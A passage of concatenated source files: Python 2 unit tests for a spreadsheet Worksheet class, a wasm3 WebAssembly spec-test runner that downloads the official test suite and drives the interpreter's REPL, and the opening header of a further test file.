    def test_append_console_text(self):
        # Console text accumulates as HTML spans classed by log_type
        # ('error' is the default; 'output' and 'system' are explicit).
        ws = Worksheet()
        ws.add_console_text('a first error')
        self.assertEquals(
            ws._console_text,
            '<span class="console_error_text">a first error</span>')
        ws.add_console_text('a second error\noh noez!')
        self.assertEquals(
            ws._console_text,
            '<span class="console_error_text">a first error</span>'
            '<span class="console_error_text">a second error\n'
            'oh noez!</span>')
        ws.add_console_text('not an error', log_type='output')
        self.assertEquals(
            ws._console_text,
            '<span class="console_error_text">a first error</span>'
            '<span class="console_error_text">a second error\n'
            'oh noez!</span>'
            '<span class="console_output_text">not an error</span>')
        ws.add_console_text('A system timing report, for example :-)', log_type='system')
        self.assertEquals(
            ws._console_text,
            '<span class="console_error_text">a first error</span>'
            '<span class="console_error_text">a second error\n'
            'oh noez!</span>'
            '<span class="console_output_text">not an error</span>'
            '<span class="console_system_text">A system timing report, for example :-)</span>')
        ws.add_console_text('<b></b>', log_type='output')
        self.assertEquals(
            ws._console_text,
            '<span class="console_error_text">a first error</span>'
            '<span class="console_error_text">a second error\n'
            'oh noez!</span>'
            '<span class="console_output_text">not an error</span>'
            '<span class="console_system_text">A system timing report, for example :-)</span>'
            '<span class="console_output_text"><b></b></span>')

    def test_to_location(self):
        # to_location normalises tuples and A1-style names to a (col, row)
        # pair; anything unrecognisable maps to None.
        ws = Worksheet()
        self.assertEquals( ws.to_location((1, 2)), (1, 2) )
        self.assertEquals( ws.to_location((1L, 2L)), (1L, 2L) )
        self.assertEquals( ws.to_location(('a', 2)), (1, 2) )
        self.assertEquals( ws.to_location(('A', 2)), (1, 2) )
        self.assertEquals( ws.to_location('a2'), (1, 2) )
        self.assertEquals( ws.to_location('A2'), (1, 2) )
        self.assertEquals( ws.to_location('A'), None )
        self.assertEquals( ws.to_location('1A'), None )
        self.assertEquals( ws.to_location((1, 'A')), None )
        self.assertEquals( ws.to_location(123), None )
        self.assertEquals( ws.to_location(object()), None )

    def test_setitem_on_locations_should_accept_cell_instances(self):
        ws = Worksheet()
        ws.to_location = Mock(return_value=(1, 2))
        cell = Cell()
        ws[3, 4] = cell
        self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
        self.assertEquals(ws.keys(), [(1, 2)])

    def test_setitem_on_locations_should_reject_non_cell_instances(self):
        ws = Worksheet()
        ws.to_location = Mock(return_value=(1, 2))
        expected_message_re = "^Worksheet locations must be Cell objects"
        with self.assertRaisesRegexp(TypeError, expected_message_re):
            ws[3, 4] = 123
        self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])

    def test_setitem_on_non_locations_raises_keyerror(self):
        ws = Worksheet()
        ws.to_location = Mock(return_value=None)
        with self.assertRaisesRegexp(InvalidKeyError, "^'random key' is not a valid cell location$"):
            ws['random key'] = 'sausages'

    def test_getitem_creates_cells(self):
        # Reading a never-written location materialises an empty Cell.
        ws = Worksheet()
        try:
            ws[1, 2].value = Cell()
        except KeyError:
            self.fail('Did not create cell on request')

    def test_get_item_does_not_create_cells_for_random_strings(self):
        ws = Worksheet()
        with self.assertRaisesRegexp(InvalidKeyError, "^'name' is not a valid cell location$"):
            ws['name']
        with self.assertRaisesRegexp(AttributeError, "^'Worksheet' object has no attribute 'some_random_attribute'$"):
            ws.some_random_attribute

    def test_getitem_should_use_to_location_result_if_it_is_not_none(self):
        ws = Worksheet()
        ws.to_location = Mock(return_value=(1, 2))
        ws[3, 4].formula = "hello"
        self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
        self.assertEquals(ws.keys(), [(1, 2)])
        self.assertEquals(ws.values()[0].formula, "hello")

    def test_getitem_should_use_original_key_if_to_location_gives_none(self):
        ws = Worksheet()
        ws.to_location = Mock(return_value=(3, 4))
        ws[3, 4].formula = "hello"
        self.assertEquals(ws.to_location.call_args_list, [(((3, 4),), {})])
        self.assertEquals(ws.keys(), [(3, 4)])
        self.assertEquals(ws.values()[0].formula, "hello")

    def test_getattr_should_delegate_to_getitem(self):
        ws = Worksheet()
        ws.__getitem__ = Mock()
        retval = ws.A1
        self.assertEquals( retval, ws.__getitem__.return_value )
        self.assertEquals( ws.__getitem__.call_args_list, [(('A1',), {})] )

    @patch('sheet.worksheet.cell_name_to_coordinates')
    def test_setattr_should_delegate_to_setitem_if_attr_name_is_valid_cell_name(
        self, mock_name_to_coords
    ):
        # Only names the coordinate parser recognises go through __setitem__.
        def name_to_coords(name):
            if name == 'A1':
                return (2, 3)
            else:
                return None
        mock_name_to_coords.side_effect = name_to_coords
        ws = Worksheet()
        ws.__setitem__ = Mock()
        ws.A1 = 23
        self.assertEquals( ws.__setitem__.call_args_list, [(((2, 3), 23), {})] )

    @patch('sheet.worksheet.cell_name_to_coordinates', lambda _: None)
    def test_setattr_should_not_delegate_to_setitem_if_attr_name_is_not_valid_cell_name(self):
        # With the parser rejecting everything, assignment behaves like a
        # plain attribute set.
        ws = Worksheet()
        ws.__setitem__ = Mock()
        ws.A1 = 23
        self.assertEquals( ws.__setitem__.call_args_list, [] )
        self.assertEquals( ws.A1, 23 )

    def test_set_cell_formula_with_value_should_update_internal_contents(self):
        ws = Worksheet()
        ws.set_cell_formula(1, 2, "3")
        self.assertEquals(ws[1, 2].formula, '3')

    def test_set_cell_formula_with_empty_string_should_clear_internal_contents_if_they_exist(self):
        ws = Worksheet()
        ws[1, 2].formula = "=1"
        ws.set_cell_formula(1, 2, "")
        self.assertFalse((1, 2) in ws)

    def test_set_cell_formula_with_empty_string_should_do_nothing_if_no_preexisting_internal_contents(self):
        ws = Worksheet()
        ws.set_cell_formula(1, 2, "")
        self.assertFalse((1, 2) in ws)

    def test_clear_values_clears_values_and_formatted_values_and_errors(self):
        # clear_values wipes computed state (value/formatted_value/error)
        # but leaves formulas intact.
        ws = Worksheet()
        ws[1, 2].formula = "=1"
        ws[1, 2].python_formula = "2"
        ws[1, 2].value = "hello!"
        ws[1, 2].formatted_value = "Guten Tag!"
        ws[1, 2].error = "Goodness Gracious!"
        ws[2, 2].python_formula = "1 + 1"
        ws.clear_values()
        self.assertEquals(ws[1, 2].formula, "=1")
        self.assertEquals(ws[1, 2].python_formula, "2")
        self.assertEquals(ws[1, 2].value, undefined)
        self.assertEquals(ws[1, 2].formatted_value, u'')
        self.assertEquals(ws[1, 2].error, None)
        self.assertEquals(ws[2, 2].python_formula, '1 + 1')

    def test_clear_values_deletes_cells_with_no_formula(self):
        ws = Worksheet()
        ws[1, 2].formula = None
        ws[1, 2].value = "hello!"
        ws[1, 2].formatted_value = "Guten Tag!"
        ws.clear_values()
        self.assertFalse((1, 2) in ws)

    def test_clear_values_deletes_cells_with_empty_formula(self):
        ws = Worksheet()
        ws[1, 2].formula = ''
        ws[1, 2].value = "hello!"
        ws[1, 2].formatted_value = "Guten Tag!"
        ws.clear_values()
        self.assertFalse((1, 2) in ws)

    def test_iteration_yields_cells(self):
        ws = Worksheet()
        ws[1, 1].formula = 'A1'
        ws[2, 4].formula = 'B4'
        ws.name = 'any old name'
        self.assertEquals(ws.items(), [((1, 1), ws[1, 1]), ((2, 4), ws[2, 4])])

    def test_add_console_text_is_thread_safe(self):
        # Hammer add_console_text from many threads, then verify every
        # thread's chunks all made it (uncorrupted) into the final text.
        ws = Worksheet()
        num_threads = 100
        num_chars = 1000
        num_tries = 20
        def get_console_text_adder(char_num):
            def inner():
                for _ in range(num_tries):
                    ws.add_console_text(str(char_num) * num_chars)
            return inner
        threads = []
        for i in range(num_threads):
            threads.append(Thread(target=get_console_text_adder(i)))
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        for i in range(num_threads):
            found_pos = -num_chars
            for _ in range(num_tries):
                found_pos = ws._console_text.find(str(i) * num_chars, found_pos + num_chars)
                self.assertNotEqual(found_pos, -1, 'could not find all output for thread %s' % (str(i),))

    def test_getting_bounds_on_empty_sheet_should_return_none(self):
        ws = Worksheet()
        self.assertEquals(ws.bounds, None)

    def test_getting_bounds_with_one_cell_should_return_bounds(self):
        ws = Worksheet()
        ws[3, 5].value = "Top right and bottom left!"
        self.assertEquals(type(ws.bounds), Bounds)
        self.assertEquals(ws.bounds, (3, 5, 3, 5))

    def test_getting_bounds_with_two_cells_should_return_bounds(self):
        ws = Worksheet()
        ws[5, 3].value = "Top right"
        ws[3, 11].value = "Bottom left"
        self.assertEquals(type(ws.bounds), Bounds)
        self.assertEquals(ws.bounds, (3, 3, 5, 11))

    def test_setting_bounds_should_fail(self):
        # bounds is a read-only computed property.
        ws = Worksheet()
        with self.assertRaises(AttributeError):
            ws.bounds = Bounds((1, 2, 3, 4))
class TestWorksheetCellRangeConstructor(ResolverTestCase):
    """Worksheet.cell_range accepts coordinate tuples, a single 'A1:C4'
    string, a pair of A1-style names, or a mix; bad input raises ValueError."""

    def test_two_tuple_parameters(self):
        ws = Worksheet()
        cell_range = ws.cell_range((2, 3), (5, 4))
        self.assertEquals(cell_range.left, 2)
        self.assertEquals(cell_range.top, 3)
        self.assertEquals(cell_range.right, 5)
        self.assertEquals(cell_range.bottom, 4)

    def test_single_string_parameter_uses_formula_notation(self):
        ws = Worksheet()
        cell_range = ws.cell_range('A2:C4')
        self.assertEquals(cell_range.left, 1)
        self.assertEquals(cell_range.top, 2)
        self.assertEquals(cell_range.right, 3)
        self.assertEquals(cell_range.bottom, 4)
        try:
            _ = ws.cell_range('A1:wibble')
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "Invalid cell range 'A1:wibble'")
        try:
            _ = ws.cell_range('wobblewibble')
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "Invalid cell range 'wobblewibble'")

    def test_double_string_parameters_use_a1_notation(self):
        ws = Worksheet()
        cell_range = ws.cell_range('A2','C4')
        self.assertEquals(cell_range.left, 1)
        self.assertEquals(cell_range.top, 2)
        self.assertEquals(cell_range.right, 3)
        self.assertEquals(cell_range.bottom, 4)
        # Each invalid corner is reported by name; both invalid gives a
        # combined message.
        try:
            _ = ws.cell_range('wabble','C4')
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "wabble is not a valid cell location")
        try:
            _ = ws.cell_range('A1','wooble')
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "wooble is not a valid cell location")
        try:
            _ = ws.cell_range('weebble','beeble')
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "Neither weebble nor beeble are valid cell locations")

    def test_mixed_parameters(self):
        # Corners may be given in either order; the range is normalised so
        # left/top holds the minimum and right/bottom the maximum.
        ws = Worksheet()
        cell_range = ws.cell_range((10, 10),'C4')
        self.assertEquals(cell_range.left, 3)
        self.assertEquals(cell_range.top, 4)
        self.assertEquals(cell_range.right, 10)
        self.assertEquals(cell_range.bottom, 10)
        try:
            _ = ws.cell_range('wipple',(1,2))
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "wipple is not a valid cell location")
        try:
            _ = ws.cell_range((2, 2),'wapple')
            self.fail('should raise ValueError')
        except ValueError, e:
            self.assertEquals(str(e), "wapple is not a valid cell location")
class BoundsTest(ResolverTestCase):
    """Unit tests for the Bounds value type."""

    def test_bounds_acts_like_tuple(self):
        """Bounds is a tuple subclass and unpacks positionally."""
        b = Bounds((1, 2, 3, 4))
        self.assertTrue(isinstance(b, tuple))
        first, second, third, fourth = b
        self.assertEquals((first, second, third, fourth), (1, 2, 3, 4))

    def test_bounds_has_sweet_properties(self):
        """Each edge is also exposed as a named property."""
        b = Bounds((1, 2, 3, 4))
        for attr_name, expected in (
            ('left', 1), ('top', 2), ('right', 3), ('bottom', 4)
        ):
            self.assertEquals(getattr(b, attr_name), expected)

    def test_bounds_barfs_on_wrong_number_of_parameters(self):
        """Anything other than exactly four components raises ValueError."""
        for bad in ((1, 2, 3), (1, 2, 3, 4, 5)):
            self.assertRaises(ValueError, lambda bad=bad: Bounds(bad))
|
run-spec-test.py | #!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-spec-test.py
# ./run-spec-test.py ./core/i32.json
# ./run-spec-test.py ./core/float_exprs.json --line 2070
# ./run-spec-test.py ./proposals/tail-call/*.json
# ./run-spec-test.py --exec "../build-custom/wasm3 --repl"
#
# Running WASI verison with different engines:
# cp ../build-wasi/wasm3.wasm ./
# ./run-spec-test.py --exec "../build/wasm3 wasm3.wasm --repl"
# ./run-spec-test.py --exec "wasmtime --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. --backend=llvm wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer-js run wasm3.wasm --dir=. -- --repl"
# ./run-spec-test.py --exec "wasirun wasm3.wasm --repl"
# ./run-spec-test.py --exec "wavm run --mount-root ./ wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "iwasm --dir=. wasm3.wasm --repl"
#
# TODO
# - Get more tests from: https://github.com/microsoft/ChakraCore/tree/master/test/WasmSpec
# - Fix "Empty Stack" check
# - Check Canonical NaN and Arithmetic NaN separately
# - Fix imports.wast
import argparse
import os, sys, glob, time
import subprocess
import json
import re
import struct
import math
import pathlib
scriptDir = os.path.dirname(os.path.abspath(sys.argv[0]))
sys.path.append(os.path.join(scriptDir, '..', 'extra'))
from testutils import *
from pprint import pprint
#
# Args handling
#
# Command-line interface: which interpreter to drive, spec version to fetch,
# per-command timeout, and output/verbosity options.
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3 --repl")
parser.add_argument("--spec", default="v1.1")
parser.add_argument("--timeout", type=int, default=30)
parser.add_argument("--line", metavar="<source line>", type=int)
parser.add_argument("--all", action="store_true")
parser.add_argument("--show-logs", action="store_true")
parser.add_argument("--format", choices=["raw", "hex", "fp"], default="fp")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-s", "--silent", action="store_true")
parser.add_argument("file", nargs='*')
args = parser.parse_args()
if args.line:
    # Focusing on a single source line implies showing its logs.
    args.show_logs = True
#
# Utilities
#
# Human-readable trace of the run; a separator marks each fresh session.
log = open("spec-test.log","w+")
log.write("======================\n")
def warning(msg, force=False):
    """Record a warning in the log file; echo to stdout when verbose or forced."""
    log.write(f"Warning: {msg}\n")
    log.flush()
    should_print = force or args.verbose
    if should_print:
        print(f"{ansi.WARNING}Warning:{ansi.ENDC} {msg}")
def fatal(msg):
    """Log a fatal error, print it, and terminate the process with status 1."""
    log.write(f"Fatal: {msg}\n")
    log.flush()
    print(f"{ansi.FAIL}Fatal:{ansi.ENDC} {msg}")
    sys.exit(1)
def binaryToFloat(num, t):
    """Reinterpret the integer bit pattern *num* as an IEEE-754 float.

    *t* selects the width: "f32" or "f64"; any other type is a fatal error.
    *num* may be anything int() accepts (int or decimal string).
    """
    packers = {"f32": ('!L', '!f'), "f64": ('!Q', '!d')}
    if t not in packers:
        fatal(f"Unknown type '{t}'")
    int_fmt, float_fmt = packers[t]
    return struct.unpack(float_fmt, struct.pack(int_fmt, int(num)))[0]
def escape_str(s):
    """Render *s* for the REPL command line: kept verbatim when it is safely
    printable ASCII, otherwise hex-escaped byte by byte (UTF-8); the empty
    string becomes the literal NUL escape."""
    if not s:
        return r'\x00'
    def is_plain(ch):
        return ord(ch) < 128 and ch.isprintable() and ch not in " \n\r\t\\"
    if all(is_plain(ch) for ch in s):
        return s
    return "".join(f"\\x{byte:02x}" for byte in s.encode("utf-8"))
#
# Value format options
#
def formatValueRaw(num, t):
    # Display a value exactly as it appears in the test JSON; the type tag is ignored.
    return str(num)
def formatValueHex(num, t):
    """Format a value as zero-padded hex: 8 digits for 32-bit types, 16 for
    64-bit types; anything else falls back to its plain string form."""
    widths = {"f32": 10, "i32": 10, "f64": 18, "i64": 18}  # width includes the "0x" prefix
    if t in widths:
        return format(int(num), f"#0{widths[t]}x")
    return str(num)
def formatValueFloat(num, t):
    """Format a raw bit pattern as a decimal float (f32/f64), trimming trailing
    zeros; other types pass through as plain strings.  Overly long renderings
    fall back to scientific notation."""
    precision = {"f32": 6, "f64": 10}.get(t)
    if precision is None:
        return str(num)
    value = binaryToFloat(num, t)
    result = f"{value:.{precision}f}".rstrip("0")
    if result.endswith("."):
        result += "0"
    if len(result) > precision * 2:
        result = f"{value:.{precision}e}"
    return result
# Map --format choices to their formatter implementations.
formaters = {
    'raw': formatValueRaw,
    'hex': formatValueHex,
    'fp': formatValueFloat,
}
formatValue = formaters[args.format]  # formatter applied to both expected and actual values
if args.format == "fp":
    # "fp" compares rounded decimal renderings, so distinct bit patterns can collide.
    print("When using fp display format, values are compared loosely (some tests may produce false positives)")
#
# Spec tests preparation
#
# First-run setup: download and unpack the spec testsuite into ./core and ./proposals.
if not (os.path.isdir("./core") and os.path.isdir("./proposals")):
    from io import BytesIO
    from zipfile import ZipFile
    from urllib.request import urlopen
    officialSpec = f"https://github.com/wasm3/wasm-core-testsuite/archive/{args.spec}.zip"
    print(f"Downloading {officialSpec}")
    resp = urlopen(officialSpec)
    with ZipFile(BytesIO(resp.read())) as zipFile:
        for zipInfo in zipFile.infolist():
            # Keep only the .wasm/.json payloads, stripping the archive's top-level directory.
            if re.match(r".*-.*/.*/.*(\.wasm|\.json)", zipInfo.filename):
                parts = pathlib.Path(zipInfo.filename).parts
                newpath = str(pathlib.Path(*parts[1:-1]))
                newfn = str(pathlib.Path(*parts[-1:]))
                ensure_path(newpath)
                newpath = newpath + "/" + newfn
                zipInfo.filename = newpath
                zipFile.extract(zipInfo)
#
# Wasm3 REPL
#
from subprocess import Popen, STDOUT, PIPE
from threading import Thread
from queue import Queue, Empty
import shlex
class Wasm3():
    """Driver for a wasm3 REPL subprocess.

    Commands are written to stdin; stdout is drained by a background reader
    thread into a queue, and every command resynchronises on the "wasm3> "
    prompt before returning its output.
    """
    def __init__(self, exe):
        self.exe = exe                  # full interpreter command line (may include flags)
        self.p = None                   # Popen handle, None while not running
        self.loaded = None              # path of the currently loaded wasm module
        self.timeout = args.timeout     # seconds to wait for the prompt
        self.autorestart = True         # relaunch the process automatically if it died
        self.run()
    def run(self):
        """(Re)start the interpreter process and wait for the first prompt."""
        if self.p:
            self.terminate()
        cmd = shlex.split(self.exe)
        #print(f"wasm3: Starting {' '.join(cmd)}")
        self.q = Queue()
        self.p = Popen(cmd, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
        def _read_output(out, queue):
            # Reader thread: forward stdout chunks into the queue; a final
            # None marks EOF, i.e. the interpreter exited or crashed.
            for data in iter(lambda: out.read(1024), b''):
                queue.put(data)
            queue.put(None)
        self.t = Thread(target=_read_output, args=(self.p.stdout, self.q))
        self.t.daemon = True
        self.t.start()
        try:
            self._read_until("wasm3> ")
        except Exception as e:
            print(f"wasm3: Could not start: {e}")
    def restart(self):
        """Restart the interpreter, re-loading the last module when one was loaded."""
        print(f"wasm3: Restarting")
        for i in range(10):
            try:
                self.run()
                try:
                    if self.loaded:
                        self.load(self.loaded)
                except Exception as e:
                    # Best-effort: a module that fails on re-load is reported
                    # by the test that needs it.
                    pass
                break
            except Exception as e:
                print(f"wasm3: {e} => retry")
            time.sleep(0.1)
    def init(self):
        """Reset the interpreter environment (drops any loaded module)."""
        return self._run_cmd(f":init\n")
    def version(self):
        """Return the interpreter's version banner."""
        return self._run_cmd(f":version\n")
    def load(self, fn):
        """Load the wasm binary at *fn* into the REPL via the hex-streaming command."""
        self.loaded = None
        with open(fn,"rb") as f:
            wasm = f.read()
        res = self._run_cmd(f":load-hex {len(wasm)}\n{wasm.hex()}\n")
        self.loaded = fn  # remembered for restart(); set only after a successful load
        return res
    def invoke(self, cmd):
        """Invoke an exported function; *cmd* is [field_name, arg1, arg2, ...]."""
        return self._run_cmd(":invoke " + " ".join(map(str, cmd)) + "\n")
    def _run_cmd(self, cmd):
        # Send one command line and collect output up to the next prompt,
        # restarting a dead interpreter first when autorestart is on.
        if self.autorestart and not self._is_running():
            self.restart()
        self._flush_input()
        #print(f"wasm3: {cmd.strip()}")
        self._write(cmd)
        return self._read_until("wasm3> ")
    def _read_until(self, token):
        """Accumulate queued output until *token* appears; raise "Crashed" on
        reader EOF or "Timeout" when self.timeout elapses (terminating the
        process in both cases)."""
        buff = ""
        tout = time.time() + self.timeout
        error = None
        while time.time() < tout:
            try:
                data = self.q.get(timeout=0.1)
                if data == None:
                    error = "Crashed"  # reader thread signalled EOF
                    break
                buff = buff + data.decode("utf-8")
                idx = buff.rfind(token)
                if idx >= 0:
                    return buff[0:idx].strip()
            except Empty:
                pass
        else:
            error = "Timeout"  # loop exhausted its deadline without seeing the token
        self.terminate()
        raise Exception(error)
    def _write(self, data):
        self.p.stdin.write(data.encode("utf-8"))
        self.p.stdin.flush()
    def _is_running(self):
        # True while the process exists and has not exited yet.
        return self.p and (self.p.poll() == None)
    def _flush_input(self):
        # Drop stale output left over from a previous command.
        while not self.q.empty():
            self.q.get()
    def terminate(self):
        """Stop the interpreter process and forget its handle.

        NOTE(review): wait(timeout=1.0) can raise TimeoutExpired without a
        kill() fallback -- confirm whether a hung interpreter should be killed
        here.
        """
        self.p.stdin.close()
        self.p.terminate()
        self.p.wait(timeout=1.0)
        self.p = None
#
# Actual test
#
wasm3 = Wasm3(args.exec)
wasm3_ver = wasm3.version()
print(wasm3_ver)
# Tests known to fail on every target (skipped unless --all is given).
blacklist = Blacklist([
  "float_exprs.wast:* f32.nonarithmetic_nan_bitpattern*",
  "imports.wast:*",
  "names.wast:* *.wasm \\x00*", # names that start with '\0'
])
# Platform-specific skips, keyed on the interpreter's version banner.
if wasm3_ver in Blacklist(["* on i386* MSVC *", "* on i386* Clang * for Windows"]):
    warning("Win32 x86 has i64->f32 conversion precision issues, skipping some tests", True)
    # See: https://docs.microsoft.com/en-us/cpp/c-runtime-library/floating-point-support
    blacklist.add([
      "conversions.wast:* f32.convert_i64_u(9007199791611905)",
      "conversions.wast:* f32.convert_i64_u(9223371761976868863)",
      "conversions.wast:* f32.convert_i64_u(9223372586610589697)",
    ])
elif wasm3_ver in Blacklist(["* on mips* GCC *"]):
    warning("MIPS has NaN representation issues, skipping some tests", True)
    blacklist.add([
      "float_exprs.wast:* *_nan_bitpattern(*",
      "float_exprs.wast:* *no_fold_*",
    ])
elif wasm3_ver in Blacklist(["* on sparc* GCC *"]):
    warning("SPARC has NaN representation issues, skipping some tests", True)
    blacklist.add([
      "float_exprs.wast:* *.canonical_nan_bitpattern(0, 0)",
    ])
# Global counters updated by runInvoke() and the main loop.
stats = dotdict(total_run=0, skipped=0, failed=0, crashed=0, timeout=0, success=0, missing=0)
# Convert some trap names from the original spec
trapmap = {
    "unreachable": "unreachable executed"
}
def runInvoke(test):
    """Run one invoke-style assertion against the live REPL and update stats.

    *test* is a dotdict carrying .action (field + args), .source/.wasm for
    reporting, and exactly one of: .expected (list of typed values),
    .expected_trap (trap text), or .expected_anything.
    """
    test.cmd = [test.action.field]
    displayArgs = []
    for arg in test.action.args:
        test.cmd.append(arg['value'])
        displayArgs.append(formatValue(arg['value'], arg['type']))
    test_id = f"{test.source} {test.wasm} {test.cmd[0]}({', '.join(test.cmd[1:])})"
    if test_id in blacklist and not args.all:
        warning(f"Skipped {test_id} (blacklisted)")
        stats.skipped += 1
        return
    if args.verbose:
        print(f"Running {test_id}")
    stats.total_run += 1
    output = ""
    actual = None
    actual_val = None
    force_fail = False
    try:
        output = wasm3.invoke(test.cmd)
    except Exception as e:
        # Crash/Timeout from the REPL driver becomes e.g. "<Crashed>".
        actual = f"<{e}>"
        force_fail = True
    # Parse the actual output
    # The three patterns are tried in order: result, trap, generic error.
    if not actual:
        result = re.findall(r'Result: (.*?)$', "\n" + output + "\n", re.MULTILINE)
        if len(result) > 0:
            actual = "result " + result[-1]
            actual_val = result[0]
    if not actual:
        result = re.findall(r'Error: \[trap\] (.*?) \(', "\n" + output + "\n", re.MULTILINE)
        if len(result) > 0:
            actual = "trap " + result[-1]
    if not actual:
        result = re.findall(r'Error: (.*?)$', "\n" + output + "\n", re.MULTILINE)
        if len(result) > 0:
            actual = "error " + result[-1]
    if not actual:
        actual = "<No Result>"
        force_fail = True
    # Classify interpreter-level failures so they show up in the summary counters.
    if actual == "error no operation ()":
        actual = "<Not Implemented>"
        stats.missing += 1
        force_fail = True
    elif actual == "<Crashed>":
        stats.crashed += 1
        force_fail = True
    elif actual == "<Timeout>":
        stats.timeout += 1
        force_fail = True
    # Prepare the expected result
    expect = None
    if "expected" in test:
        if len(test.expected) == 0:
            expect = "result <Empty Stack>"
        elif len(test.expected) == 1:
            t = test.expected[0]['type']
            value = str(test.expected[0]['value'])
            expect = "result " + value
            if actual_val != None:
                if (t == "f32" or t == "f64") and (value == "nan:canonical" or value == "nan:arithmetic"):
                    # Any NaN bit pattern is accepted for the NaN assertions.
                    val = binaryToFloat(actual_val, t)
                    #warning(f"{actual_val} => {val}")
                    if math.isnan(val):
                        actual = "nan:any"
                        expect = "nan:any"
                else:
                    # Compare through the selected formatter (loose for "fp").
                    expect = "result " + formatValue(value, t)
                    actual = "result " + formatValue(actual_val, t)
        else:
            warning(f"Test {test.source} specifies multiple results")
            expect = "result <Multiple>"
    elif "expected_trap" in test:
        if test.expected_trap in trapmap:
            test.expected_trap = trapmap[test.expected_trap]
        expect = "trap " + str(test.expected_trap)
    elif "expected_anything" in test:
        expect = "<Anything>"
    else:
        expect = "<Unknown>"
    def showTestResult():
        # Pretty-print one test verdict (and logs when requested).
        print(" ----------------------")
        print(f"Test: {ansi.HEADER}{test_id}{ansi.ENDC}")
        print(f"Args: {', '.join(displayArgs)}")
        print(f"Expected: {ansi.OKGREEN}{expect}{ansi.ENDC}")
        print(f"Actual: {ansi.WARNING}{actual}{ansi.ENDC}")
        if args.show_logs and len(output):
            print(f"Log:")
            print(output)
    log.write(f"{test.source}\t|\t{test.wasm} {test.action.field}({', '.join(displayArgs)})\t=>\t\t")
    if actual == expect or (expect == "<Anything>" and not force_fail):
        stats.success += 1
        log.write(f"OK: {actual}\n")
        if args.line:
            showTestResult()
    else:
        stats.failed += 1
        log.write(f"FAIL: {actual}, should be: {expect}\n")
        if args.silent: return
        showTestResult()
        #sys.exit(1)
# Collect the JSON manifests to run: explicit files, or the default suites.
if args.file:
    jsonFiles = args.file
else:
    jsonFiles = glob.glob(os.path.join(".", "core", "*.json"))
    jsonFiles += glob.glob(os.path.join(".", "proposals", "sign-extension-ops", "*.json"))
    jsonFiles += glob.glob(os.path.join(".", "proposals", "nontrapping-float-to-int-conversions", "*.json"))
jsonFiles = list(map(lambda x: os.path.relpath(x, scriptDir), jsonFiles))
jsonFiles.sort()
for fn in jsonFiles:
    with open(fn, encoding='utf-8') as f:
        data = json.load(f)
    wast_source = filename(data["source_filename"])
    wasm_module = ""
    print(f"Running {fn}")
    wasm3.init()
    for cmd in data["commands"]:
        test = dotdict()
        test.line = int(cmd["line"])
        test.source = wast_source + ":" + str(test.line)
        test.wasm = wasm_module
        test.type = cmd["type"]
        if test.type == "module":
            # A "module" command makes this wasm file current for what follows.
            wasm_module = cmd["filename"]
            if args.verbose:
                print(f"Loading {wasm_module}")
            try:
                wasm_fn = os.path.join(pathname(fn), wasm_module)
                res = wasm3.load(wasm_fn)
                if res:
                    warning(res)
            except Exception as e:
                pass #fatal(str(e))
        elif ( test.type == "action" or
                test.type == "assert_return" or
                test.type == "assert_trap" or
                test.type == "assert_exhaustion" or
                test.type == "assert_return_canonical_nan" or
                test.type == "assert_return_arithmetic_nan"):
            if args.line and test.line != args.line:
                continue
            # Translate each assertion kind into the fields runInvoke() expects.
            if test.type == "action":
                test.expected_anything = True
            elif test.type == "assert_return":
                test.expected = cmd["expected"]
            elif test.type == "assert_return_canonical_nan":
                test.expected = cmd["expected"]
                test.expected[0]["value"] = "nan:canonical"
            elif test.type == "assert_return_arithmetic_nan":
                test.expected = cmd["expected"]
                test.expected[0]["value"] = "nan:arithmetic"
            elif test.type == "assert_trap":
                test.expected_trap = cmd["text"]
            elif test.type == "assert_exhaustion":
                test.expected_trap = "stack overflow"
            else:
                stats.skipped += 1
                warning(f"Skipped {test.source} ({test.type} not implemented)")
                continue
            test.action = dotdict(cmd["action"])
            if test.action.type == "invoke":
                # TODO: invoking in modules not implemented
                if test.action.module:
                    stats.skipped += 1
                    warning(f"Skipped {test.source} (invoke in module)")
                    continue
                test.action.field = escape_str(test.action.field)
                runInvoke(test)
            else:
                stats.skipped += 1
                warning(f"Skipped {test.source} (unknown action type '{test.action.type}')")
        # These are irrelevant
        elif (test.type == "assert_invalid" or
              test.type == "assert_malformed" or
              test.type == "assert_uninstantiable"):
            pass
        # Others - report as skipped
        else:
            stats.skipped += 1
            warning(f"Skipped {test.source} ('{test.type}' not implemented)")
# Sanity check: every executed test must have been counted as pass or fail.
if (stats.failed + stats.success) != stats.total_run:
    warning("Statistics summary invalid", True)
pprint(stats)
# Final summary; a non-zero exit code signals failure to CI.
if stats.failed > 0:
    failed = (stats.failed*100)/stats.total_run
    print(f"{ansi.FAIL}=======================")
    print(f" FAILED: {failed:.2f}%")
    if stats.crashed > 0:
        print(f" Crashed: {stats.crashed}")
    print(f"======================={ansi.ENDC}")
    sys.exit(1)
elif stats.success > 0:
    print(f"{ansi.OKGREEN}=======================")
    print(f" {stats.success}/{stats.total_run} tests OK")
    if stats.skipped > 0:
        print(f"{ansi.WARNING} ({stats.skipped} tests skipped){ansi.OKGREEN}")
    print(f"======================={ansi.ENDC}")
|
test_web_status.py | # -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
